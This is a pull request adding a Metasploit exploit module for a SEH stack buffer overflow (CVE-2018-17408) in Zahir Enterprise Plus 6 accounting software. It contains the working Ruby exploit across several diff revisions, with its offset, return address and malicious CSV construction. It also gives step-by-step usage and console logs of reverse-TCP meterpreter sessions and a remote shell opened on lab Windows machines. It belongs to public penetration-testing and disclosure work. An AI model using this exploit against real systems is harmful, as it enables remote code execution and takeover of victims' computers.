### PR TITLE
Add Zahir Enterprise Plus 6 build 10b Buffer Overflow (SEH) module.

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md
+++ b/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md
@@ -1,0 +1,41 @@
+## Description
+
+Zahir Accounting Enterprise 6 through build 10.b contains a buffer overflow vulnerability in its Import file functionality, which can be triggered with a crafted CSV file.
+
+## Vulnerable Application
+
+[Zahir Enterprise 6](http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip) through build 10.b
+
+[Update to build 10b](http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip)
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use exploit/windows/fileformat/zahir_enterprise_plus_csv`
+3. `run`
+4. `handler -p <payload> -H <lhost> -P <lport>`
+5. From Zahir Application. File -> Import -> Import from File -> Select option -> Specify msf generated file -> Click through to Process
+6. Get a session
+
+## Scenarios
+
+### Zahir Enterprise 6 build 10b on Windows 10 x64
+
+```
+msf5 exploit(windows/fileformat/zahir_enterprise_plus_csv) > 
+[*] Started reverse TCP handler on 172.22.222.130:4444 
+[*] Sending stage (179779 bytes) to 172.22.222.200
+[*] Meterpreter session 4 opened (172.22.222.130:4444 -> 172.22.222.200:49934) at 2018-10-04 10:09:01 -0500
+sessions -i 4
+[*] Starting interaction with 4...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-IPOGIJR
+OS              : Windows 10 (Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
+```

--- a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
+++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
@@ -17,37 +17,36 @@ class MetasploitModule < Msf::Exploit
        The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters
        via Import from other File. This results in overwriting a structured exception handler record.
       },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
+      'License'         => MSF_LICENSE,
+      'Author'          =>
         [
           'f3ci',       # initial discovery
           'modpr0be'    # poc and Metasploit Module
         ],
-      'References'     =>
+      'References'      =>
         [
           [ 'CVE', '2018-17408' ],
           [ 'EDB', '45505' ]
         ],
-      'Platform'       => 'win',
-      'Targets'        =>
+      'Platform'        => 'win',
+      'Targets'         =>
         [
-          [
-            'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal',
+          ['Zahir Enterprise Plus 6 <= build 10b',
             {
               #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
-              'Ret' => 0x52016661,
-              'Offset' => 3041
+              'Ret'     => 0x52016661,
+              'Offset'  => 3041
             }
           ]
         ],
-      'Payload'        =>
+      'Payload'         =>
         {
-          'Space' => 5000,
-          'BadChars' => "\x00\x0a\x0d\x22\x2c",
+          'Space'       => 5000,
+          'BadChars'    => "\x00\x0a\x0d\x22\x2c",
           'DisableNops'     => true
         },
-      'DisclosureDate' => 'Sep 28 2018',
-      'DefaultTarget'  => 0))
+      'DisclosureDate'  => 'Sep 28 2018',
+      'DefaultTarget'   => 0))
 
     register_options(
     [
@@ -56,7 +55,6 @@ class MetasploitModule < Msf::Exploit
   end
 
   def exploit
-
     buf = rand_text_alpha_upper(target['Offset'])
     buf << "\r\n"   # crash chars
     buf << rand_text_alpha_upper(380) # extra chars to hit the offset

--- a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
+++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-class MetasploitModule < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit
   Rank = NormalRanking
 
   include Msf::Exploit::FILEFORMAT
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Zahir Enterprise Plus 6 Stack Buffer Overflow Exploit",
+      'Name'           => "Zahir Enterprise Plus 6 Stack Buffer Overflow",
       'Description'    => %q{
        This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.
        The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters
@@ -20,8 +20,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'f3ci',       # found the vulnerability
-          'modpr0be'    # Metasploit Module
+          'f3ci',       # initial discovery
+          'modpr0be'    # poc and Metasploit Module
         ],
       'References'     =>
         [
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal',
             {
               #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
-              'Ret' => 0x52016661, 
+              'Ret' => 0x52016661,
               'Offset' => 3041
             }
           ]
@@ -44,10 +44,8 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'Space' => 5000,
           'BadChars' => "\x00\x0a\x0d\x22\x2c",
-          'DisableNops'     => true,
-          'StackAdjustment' => -3500
+          'DisableNops'     => true
         },
-      'Privileged'     => false,
       'DisclosureDate' => 'Sep 28 2018',
       'DefaultTarget'  => 0))
 
@@ -63,10 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
     buf << "\r\n"   # crash chars
     buf << rand_text_alpha_upper(380) # extra chars to hit the offset
     buf << generate_seh_record(target.ret)
-    buf << make_nops(12)
     buf << payload.encoded
-    # Size isn't very sensitive
-    buf << rand_text_alpha_upper(1200)
 
     file_create(buf)
   end

--- a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
+++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
@@ -14,19 +14,19 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => "Zahir Enterprise Plus 6 Stack Buffer Overflow Exploit",
       'Description'    => %q{
        This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.
-       The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters 
+       The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters
        via Import from other File. This results in overwriting a structured exception handler record.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'f3ci', # found the vulnerability
+          'f3ci', 		# found the vulnerability
           'modpr0be'    # Metasploit Module
         ],
       'References'     =>
         [
           [ 'CVE', '2018-17408' ],
-          [ 'EDB', '38035' ]
+          [ 'EDB', '45505' ]
         ],
       'Platform'       => 'win',
       'Targets'        =>
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'BadChars' => "\x00\x0a\x0d\x22\x2c"
         },
       'Privileged'     => false,
-      'DisclosureDate' => "Sept 28 2018",
+      'DisclosureDate' => 'Sep 28 2018',
       'DefaultTarget'  => 0))
 
     register_options(

--- a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
+++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'f3ci', 		# found the vulnerability
+          'f3ci',       # found the vulnerability
           'modpr0be'    # Metasploit Module
         ],
       'References'     =>
@@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal',
             {
-              'Ret' => 0x52016661, # P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
+              #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
+              'Ret' => 0x52016661, 
               'Offset' => 3041
             }
           ]
@@ -42,7 +43,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'Payload'        =>
         {
           'Space' => 5000,
-          'BadChars' => "\x00\x0a\x0d\x22\x2c"
+          'BadChars' => "\x00\x0a\x0d\x22\x2c",
+          'DisableNops'     => true,
+          'StackAdjustment' => -3500
         },
       'Privileged'     => false,
       'DisclosureDate' => 'Sep 28 2018',
@@ -57,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
 
     buf = rand_text_alpha_upper(target['Offset'])
-    buf << "\n\r"   # crash chars
+    buf << "\r\n"   # crash chars
     buf << rand_text_alpha_upper(380) # extra chars to hit the offset
     buf << generate_seh_record(target.ret)
     buf << make_nops(12)

--- a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
+++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb
@@ -1,0 +1,70 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Zahir Enterprise Plus 6 Stack Buffer Overflow Exploit",
+      'Description'    => %q{
+       This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.
+       The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters 
+       via Import from other File. This results in overwriting a structured exception handler record.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'f3ci', # found the vulnerability
+          'modpr0be'    # Metasploit Module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2018-17408' ],
+          [ 'EDB', '38035' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [
+            'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal',
+            {
+              'Ret' => 0x52016661, # P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
+              'Offset' => 3041
+            }
+          ]
+        ],
+      'Payload'        =>
+        {
+          'Space' => 5000,
+          'BadChars' => "\x00\x0a\x0d\x22\x2c"
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Sept 28 2018",
+      'DefaultTarget'  => 0))
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'The malicious file name', 'msf.csv'])
+    ])
+  end
+
+  def exploit
+
+    buf = rand_text_alpha_upper(target['Offset'])
+    buf << "\n\r"   # crash chars
+    buf << rand_text_alpha_upper(380) # extra chars to hit the offset
+    buf << generate_seh_record(target.ret)
+    buf << make_nops(12)
+    buf << payload.encoded
+    # Size isn't very sensitive
+    buf << rand_text_alpha_upper(1200)
+
+    file_create(buf)
+  end
+end


### PR DESCRIPTION
Add Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH) module based on [EDB-45505](https://www.exploit-db.com/exploits/45505/).

Vulnerability occurs when the Zahir cannot handle large inputs and anomalies crafted CSV file. The Zahir main program failed to process the CR LF (Carriage Return Line Feed) characters which caused the Zahir main program to crash.

- Homepage: http://www.zahiraccounting.com/
- Source: 
   - http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip (main installer)
   - http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip (update to build 10b)
- Tested on: Windows 7 x64, Windows 8.1 x64, Windows 10 x64
- Usage:
   - Extract the main installer first, run the setup.exe -> choose Enterprise.
   - To update to the latest build (10b), extract the latest build to the main installation folder "C:\Program Files (x86)\Zahir Personal 6 - Demo Version")
   - Run the application, choose Sample Data or we can Create Data (I choose Sample Data for simplicity),
   - Run msfconsole and the exploit module prepare for handler
   - Send the file to the target machine
   - For the vulnerability, go to File in the up left corner -> Import -> Import from Other File -> Next -> Choose any options -> Next -> Choose the msf.csv -> Next until Process button appear -> Process.

![proof image](http://i64.tinypic.com/2hibdw3.png)

## Generate msf.csv example output (tested on Windows 8.1 x64)
```
msf > use exploit/windows/fileformat/zahir_enterprise_plus_csv 
msf exploit(windows/fileformat/zahir_enterprise_plus_csv) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/zahir_enterprise_plus_csv) > set LHOST 192.168.240.134
LHOST => 192.168.240.134
msf exploit(windows/fileformat/zahir_enterprise_plus_csv) > exploit 

[+] msf.csv stored at /root/.msf4/local/msf.csv
msf exploit(windows/fileformat/zahir_enterprise_plus_csv) >
```
## Handler example output
```
msf exploit(windows/fileformat/zahir_enterprise_plus_csv) > use multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.240.134
LHOST => 192.168.240.134
msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.240.134:4444 
[*] Sending stage (179779 bytes) to 192.168.240.133
[*] Meterpreter session 1 opened (192.168.240.134:4444 -> 192.168.240.133:49727) at 2018-10-03 07:38:31 -0400

meterpreter > getuid
Server username: W81LAB\Win8.1Lab
meterpreter > shell
Process 2952 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\Win8.1Lab\Downloads>
```
